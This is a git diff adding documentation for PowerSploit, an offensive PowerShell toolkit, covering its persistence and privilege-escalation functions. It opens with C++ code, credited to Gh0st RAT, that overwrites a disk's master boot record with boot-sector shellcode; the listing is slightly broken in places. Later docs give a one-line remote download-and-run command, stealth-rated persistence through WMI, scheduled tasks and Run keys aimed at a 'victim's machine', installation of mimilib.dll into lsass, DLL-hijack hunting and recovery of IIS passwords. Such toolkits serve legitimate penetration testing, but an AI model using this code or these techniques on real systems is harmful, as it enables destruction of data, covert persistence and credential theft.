+This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
+
+// CGh0stApp message handlers
+
+unsigned char scode\[\] =
+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
+
+int CGh0stApp::KillMBR()
+{
+ HANDLE hDevice;
+ DWORD dwBytesWritten, dwBytesReturned;
+ BYTE pMBR\[512\] = {0};
+
+ // ????MBR
+ memcpy(pMBR, scode, sizeof(scode) - 1);
+ pMBR\[510\] = 0x55;
+ pMBR\[511\] = 0xAA;
+
+ hDevice = CreateFile
+ (
+ "\\\\\\\\.\\\\PHYSICALDRIVE0",
+ GENERIC_READ | GENERIC_WRITE,
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+ NULL,
+ OPEN_EXISTING,
+ 0,
+ NULL
+ );
+ if (hDevice == INVALID_HANDLE_VALUE)
+ return -1;
+ DeviceIoControl
+ (
+ hDevice,
+ FSCTL_LOCK_VOLUME,
+ NULL,
+ 0,
+ NULL,
+ 0,
+ &dwBytesReturned,
+ NUL
+ )
+ // ??????
+ WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
+ DeviceIoControl
+ (
+ hDevice,
+ FSCTL_UNLOCK_VOLUME,
+ NULL,
+ 0,
+ NULL,
+ 0,
+ &dwBytesReturned,
+ NULL
+ );
+ CloseHandle(hDevice);
+
+ ExitProcess(-1);
+ return 0;
+}
+
+## RELATED LINKS
+
diff --git a/docs/Persistence/Add-Persistence.md b/docs/Persistence/Add-Persistence.md new file mode 100755 index 0000000..bdd14fb --- /dev/null +++ b/docs/Persistence/Add-Persistence.md @@ -0,0 +1,227 @@ +# Add-Persistence
+
+## SYNOPSIS
+Add persistence capabilities to a script.
+
+PowerSploit Function: Add-Persistence
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption
+Optional Dependencies: None
+
+## SYNTAX
+
+### ScriptBlock
+```
+Add-Persistence -ScriptBlock <ScriptBlock> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
+ [-DoNotPersistImmediately] [-PassThru]
+```
+
+### FilePath
+```
+Add-Persistence -FilePath <String> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
+ [-DoNotPersistImmediately] [-PassThru]
+```
+
+## DESCRIPTION
+Add-Persistence will add persistence capabilities to any script or scriptblock.
+This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+```
+
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
+
+Description
+-----------
+Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.
+elevated) determined at runtime.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
+```
+
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
+
+Description
+-----------
+Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.
+elevated) determined at runtime.
+The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement.
+The final, encoded output is finally saved to .\EncodedPersistentScript.ps1
+
+## PARAMETERS
+
+### -ScriptBlock
+Specifies a scriptblock containing your payload.
+
+```yaml
+Type: ScriptBlock
+Parameter Sets: ScriptBlock
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -FilePath
+Specifies the path to your payload.
+
+```yaml
+Type: String
+Parameter Sets: FilePath
+Aliases: Path
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ElevatedPersistenceOption
+Specifies the trigger for the persistent payload if the target is running elevated.
+You must run New-ElevatedPersistenceOption to generate this argument.
+
+```yaml
+Type: Object
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserPersistenceOption
+Specifies the trigger for the persistent payload if the target is not running elevated.
+You must run New-UserPersistenceOption to generate this argument.
+
+```yaml
+Type: Object
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PersistenceScriptName
+Specifies the name of the function that will wrap the original payload.
+The default value is 'Update-Windows'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Update-Windows
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PersistentScriptFilePath
+Specifies the path where you would like to output the persistence script.
+By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: "$PWD\Persistence.ps1"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RemovalScriptFilePath
+Specifies the path where you would like to output a script that will remove the persistent payload.
+By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: "$PWD\RemovePersistence.ps1"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DoNotPersistImmediately
+Output only the wrapper function for the original payload.
+By default, Add-Persistence will output a script that will automatically attempt to persist (e.g.
+it will end with 'Update-Windows -Persist').
+If you are in a position where you are running in memory but want to persist at a later time, use this option.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PassThru
+Outputs the contents of the persistent script to the pipeline.
+This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### None
+
+Add-Persistence cannot receive any input from the pipeline.
+
+## OUTPUTS
+
+### System.Management.Automation.ScriptBlock
+
+If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.
+
+## NOTES
+When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
diff --git a/docs/Persistence/Get-SecurityPackage.md b/docs/Persistence/Get-SecurityPackage.md new file mode 100755 index 0000000..2a0cdef --- /dev/null +++ b/docs/Persistence/Get-SecurityPackage.md @@ -0,0 +1,37 @@ +# Get-SecurityPackage
+
+## SYNOPSIS
+Enumerates all loaded security packages (SSPs).
+
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-SecurityPackage
+```
+
+## DESCRIPTION
+Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
+It also parses the returned SecPkgInfo struct array.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-SecurityPackage
+```
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Persistence/Install-SSP.md b/docs/Persistence/Install-SSP.md new file mode 100755 index 0000000..99193c0 --- /dev/null +++ b/docs/Persistence/Install-SSP.md @@ -0,0 +1,60 @@ +# Install-SSP
+
+## SYNOPSIS
+Installs a security support provider (SSP) dll.
+
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Install-SSP [[-Path] <String>]
+```
+
+## DESCRIPTION
+Install-SSP installs an SSP dll.
+Installation involves copying the dll to
+%windir%\System32 and adding the name of the dll to
+HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Install-SSP -Path .\mimilib.dll
+```
+
+## PARAMETERS
+
+### -Path
+{{Fill Path Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+The SSP dll must match the OS architecture.
+i.e.
+You must have a 64-bit SSP dll
+if you are running a 64-bit OS.
+In order for the SSP dll to be loaded properly
+into lsass, the dll must export SpLsaModeInitialize.
+
+## RELATED LINKS
+
diff --git a/docs/Persistence/New-ElevatedPersistenceOption.md b/docs/Persistence/New-ElevatedPersistenceOption.md new file mode 100755 index 0000000..efe215d --- /dev/null +++ b/docs/Persistence/New-ElevatedPersistenceOption.md @@ -0,0 +1,235 @@ +# New-ElevatedPersistenceOption
+
+## SYNOPSIS
+Configure elevated persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-ElevatedPersistenceOption
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### PermanentWMIAtStartup
+```
+New-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup]
+```
+
+### PermanentWMIDaily
+```
+New-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At <DateTime>
+```
+
+### ScheduledTaskOnIdle
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle]
+```
+
+### ScheduledTaskAtLogon
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon]
+```
+
+### ScheduledTaskHourly
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-Hourly]
+```
+
+### ScheduledTaskDaily
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
+```
+
+### Registry
+```
+New-ElevatedPersistenceOption [-Registry] [-AtLogon]
+```
+
+## DESCRIPTION
+New-ElevatedPersistenceOption allows for the configuration of elevated persistence options.
+The output of this function is a required parameter of Add-Persistence.
+Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+```
+
+## PARAMETERS
+
+### -PermanentWMI
+Persist via a permanent WMI event subscription.
+This option will be the most difficult to detect and remove.
+
+Detection Difficulty: Difficult
+Removal Difficulty: Difficult
+User Detectable?
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIAtStartup, PermanentWMIDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ScheduledTask
+Persist via a scheduled task.
+
+Detection Difficulty: Moderate
+Removal Difficulty: Moderate
+User Detectable?
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskAtLogon, ScheduledTaskHourly, ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Registry
+Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
+Note: This option will briefly pop up a PowerShell console to the user.
+
+Detection Difficulty: Easy
+Removal Difficulty: Easy
+User Detectable?
+Yes
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Daily
+Starts the payload daily.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Hourly
+Starts the payload hourly.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskHourly
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -At
+Starts the payload at the specified time.
+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+```yaml
+Type: DateTime
+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OnIdle
+Starts the payload after one minute of idling.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtLogon
+Starts the payload upon any user logon.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskAtLogon, Registry
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtStartup
+Starts the payload within 240 and 325 seconds of computer startup.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIAtStartup
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
diff --git a/docs/Persistence/New-UserPersistenceOption.md b/docs/Persistence/New-UserPersistenceOption.md new file mode 100755 index 0000000..c7c020f --- /dev/null +++ b/docs/Persistence/New-UserPersistenceOption.md @@ -0,0 +1,179 @@ +# New-UserPersistenceOption
+
+## SYNOPSIS
+Configure user-level persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-UserPersistenceOption
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### ScheduledTaskOnIdle
+```
+New-UserPersistenceOption [-ScheduledTask] [-OnIdle]
+```
+
+### ScheduledTaskHourly
+```
+New-UserPersistenceOption [-ScheduledTask] [-Hourly]
+```
+
+### ScheduledTaskDaily
+```
+New-UserPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
+```
+
+### Registry
+```
+New-UserPersistenceOption [-Registry] [-AtLogon]
+```
+
+## DESCRIPTION
+New-UserPersistenceOption allows for the configuration of elevated persistence options.
+The output of this function is a required parameter of Add-Persistence.
+Available persitence options in order of stealth are the following: scheduled task, registry.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+```
+
+## PARAMETERS
+
+### -ScheduledTask
+Persist via a scheduled task.
+
+Detection Difficulty: Moderate
+Removal Difficulty: Moderate
+User Detectable?
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskHourly, ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Registry
+Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
+Note: This option will briefly pop up a PowerShell console to the user.
+
+Detection Difficulty: Easy
+Removal Difficulty: Easy
+User Detectable?
+Yes
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Daily
+Starts the payload daily.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Hourly
+Starts the payload hourly.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskHourly
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -At
+Starts the payload at the specified time.
+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+```yaml
+Type: DateTime
+Parameter Sets: ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OnIdle
+Starts the payload after one minute of idling.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtLogon
+Starts the payload upon any user logon.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
diff --git a/docs/Privesc/Add-ServiceDacl.md b/docs/Privesc/Add-ServiceDacl.md new file mode 100755 index 0000000..13e4d64 --- /dev/null +++ b/docs/Privesc/Add-ServiceDacl.md @@ -0,0 +1,68 @@ +# Add-ServiceDacl
+
+## SYNOPSIS
+Adds a Dacl field to a service object returned by Get-Service.
+
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Add-ServiceDacl [-Name] <String[]>
+```
+
+## DESCRIPTION
+Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
+Dacl field to each object.
+It does this by opening a handle with ReadControl for the
+service with using the GetServiceHandle Win32 API call and then uses
+QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Service | Add-ServiceDacl
+```
+
+Add Dacls for every service the current user can read.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service -Name VMTools | Add-ServiceDacl
+```
+
+Add the Dacl to the VMTools service object.
+
+## PARAMETERS
+
+### -Name
+An array of one or more service names to add a service Dacl for.
+Passable on the pipeline.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### ServiceProcess.ServiceController
+
+## NOTES
+
+## RELATED LINKS
+
+[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)
+
diff --git a/docs/Privesc/Enable-Privilege.md b/docs/Privesc/Enable-Privilege.md new file mode 100755 index 0000000..6de9c43 --- /dev/null +++ b/docs/Privesc/Enable-Privilege.md @@ -0,0 +1,105 @@ +# Enable-Privilege
+
+## SYNOPSIS
+Enables a specific privilege for the current process.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Enable-Privilege [-Privilege] <String[]>
+```
+
+## DESCRIPTION
+Uses RtlAdjustPrivilege to enable a specific privilege for the current process.
+Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege
+can be passed on the pipeline.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ProcessTokenPrivilege
+```
+
+Privilege Attributes ProcessId
+ --------- ---------- ---------
+ SeShutdownPrivilege DISABLED 3620
+ SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620
+ SeUndockPrivilege DISABLED 3620
+SeIncreaseWorkingSetPrivilege DISABLED 3620
+ SeTimeZonePrivilege DISABLED 3620
+
+Enable-Privilege SeShutdownPrivilege
+
+Get-ProcessTokenPrivilege
+
+ Privilege Attributes ProcessId
+ --------- ---------- ---------
+ SeShutdownPrivilege SE_PRIVILEGE_ENABLED 3620
+ SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620
+ SeUndockPrivilege DISABLED 3620
+SeIncreaseWorkingSetPrivilege DISABLED 3620
+ SeTimeZonePrivilege DISABLED 3620
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ProcessTokenPrivilege
+```
+
+Privilege Attributes ProcessId
+--------- ---------- ---------
+SeShutdownPrivilege DISABLED 2828
+SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828
+SeUndockPrivilege DISABLED 2828
+SeIncreaseWorkingSetPrivilege DISABLED 2828
+SeTimeZonePrivilege DISABLED 2828
+
+
+Get-ProcessTokenPrivilege | Enable-Privilege -Verbose
+VERBOSE: Attempting to enable SeShutdownPrivilege
+VERBOSE: Attempting to enable SeChangeNotifyPrivilege
+VERBOSE: Attempting to enable SeUndockPrivilege
+VERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege
+VERBOSE: Attempting to enable SeTimeZonePrivilege
+
+Get-ProcessTokenPrivilege
+
+Privilege Attributes ProcessId
+--------- ---------- ---------
+SeShutdownPrivilege SE_PRIVILEGE_ENABLED 2828
+SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828
+SeUndockPrivilege SE_PRIVILEGE_ENABLED 2828
+SeIncreaseWorkingSetPrivilege SE_PRIVILEGE_ENABLED 2828
+SeTimeZonePrivilege SE_PRIVILEGE_ENABLED 2828
+
+## PARAMETERS
+
+### -Privilege
+{{Fill Privilege Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Privileges
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html](http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html)
+
diff --git a/docs/Privesc/Find-PathDLLHijack.md b/docs/Privesc/Find-PathDLLHijack.md new file mode 100755 index 0000000..f43fc69 --- /dev/null +++ b/docs/Privesc/Find-PathDLLHijack.md @@ -0,0 +1,45 @@ +# Find-PathDLLHijack
+
+## SYNOPSIS
+Finds all directories in the system %PATH% that are modifiable by the current user.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ModifiablePath
+
+## SYNTAX
+
+```
+Find-PathDLLHijack
+```
+
+## DESCRIPTION
+Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath
+to return the folder paths the current user can write to.
+On Windows 7, if wlbsctrl.dll is
+written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search
+order loading.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-PathDLLHijack
+```
+
+Finds all %PATH% .DLL hijacking opportunities.
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.HijackableDLL.Path
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)
+
diff --git a/docs/Privesc/Find-ProcessDLLHijack.md b/docs/Privesc/Find-ProcessDLLHijack.md new file mode 100755 index 0000000..bbece58 --- /dev/null +++ b/docs/Privesc/Find-ProcessDLLHijack.md @@ -0,0 +1,127 @@ +# Find-ProcessDLLHijack
+
+## SYNOPSIS
+Finds all DLL hijack locations for currently running processes.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Find-ProcessDLLHijack [[-Name] <String[]>] [-ExcludeWindows] [-ExcludeProgramFiles] [-ExcludeOwned]
+```
+
+## DESCRIPTION
+Enumerates all currently running processes with Get-Process (or accepts an
+input process object from Get-Process) and enumerates the loaded modules for each.
+All loaded module name exists outside of the process binary base path, as those
+are DLL load-order hijack candidates.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-ProcessDLLHijack
+```
+
+Finds possible hijackable DLL locations for all processes.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Process VulnProcess | Find-ProcessDLLHijack
+```
+
+Finds possible hijackable DLL locations for the 'VulnProcess' processes.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles
+```
+
+Finds possible hijackable DLL locations not in C:\Windows\* and
+not in C:\Program Files\* or C:\Program Files (x86)\*
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Find-ProcessDLLHijack -ExcludeOwned
+```
+
+Finds possible hijackable DLL location for processes not owned by the
+current user.
+
+## PARAMETERS
+
+### -Name
+The name of a process to enumerate for possible DLL path hijack opportunities.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ProcessName
+
+Required: False
+Position: 1
+Default value: $(Get-Process | Select-Object -Expand Name)
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ExcludeWindows
+Exclude paths from C:\Windows\* instead of just C:\Windows\System32\*
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeProgramFiles
+Exclude paths from C:\Program Files\* and C:\Program Files (x86)\*
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeOwned
+Exclude processes the current user owns.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.HijackableDLL.Process
+
+## NOTES
+
+## RELATED LINKS
+
+[https://www.mandiant.com/blog/malware-persistence-windows-registry/](https://www.mandiant.com/blog/malware-persistence-windows-registry/)
+
diff --git a/docs/Privesc/Get-ApplicationHost.md b/docs/Privesc/Get-ApplicationHost.md new file mode 100755 index 0000000..44d07d7 --- /dev/null +++ b/docs/Privesc/Get-ApplicationHost.md @@ -0,0 +1,95 @@ +# Get-ApplicationHost
+
+## SYNOPSIS
+Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system.
+
+Author: Scott Sutherland
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-ApplicationHost
+```
+
+## DESCRIPTION
+This script will decrypt and recover application pool and virtual directory passwords
+from the applicationHost.config file on the system.
+The output supports the
+pipeline which can be used to convert all of the results into a pretty table by piping
+to format-table.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Return application pool and virtual directory passwords from the applicationHost.config on the system.
+```
+
+Get-ApplicationHost
+
+user : PoolUser1
+pass : PoolParty1!
+type : Application Pool
+vdir : NA
+apppool : ApplicationPool1
+user : PoolUser2
+pass : PoolParty2!
+type : Application Pool
+vdir : NA
+apppool : ApplicationPool2
+user : VdirUser1
+pass : VdirPassword1!
+type : Virtual Directory
+vdir : site1/vdir1/
+apppool : NA
+user : VdirUser2
+pass : VdirPassword2!
+type : Virtual Directory
+vdir : site2/
+apppool : NA
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Return a list of cleartext and decrypted connect strings from web.config files.
+```
+
+Get-ApplicationHost | Format-Table -Autosize
+
+user pass type vdir apppool
+---- ---- ---- ---- -------
+PoolUser1 PoolParty1!
+Application Pool NA ApplicationPool1
+PoolUser2 PoolParty2!
+Application Pool NA ApplicationPool2
+VdirUser1 VdirPassword1!
+Virtual Directory site1/vdir1/ NA
+VdirUser2 VdirPassword2!
+Virtual Directory site2/ NA
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Data.DataTable
+
+System.Boolean
+
+## NOTES
+Author: Scott Sutherland - 2014, NetSPI
+Version: Get-ApplicationHost v1.0
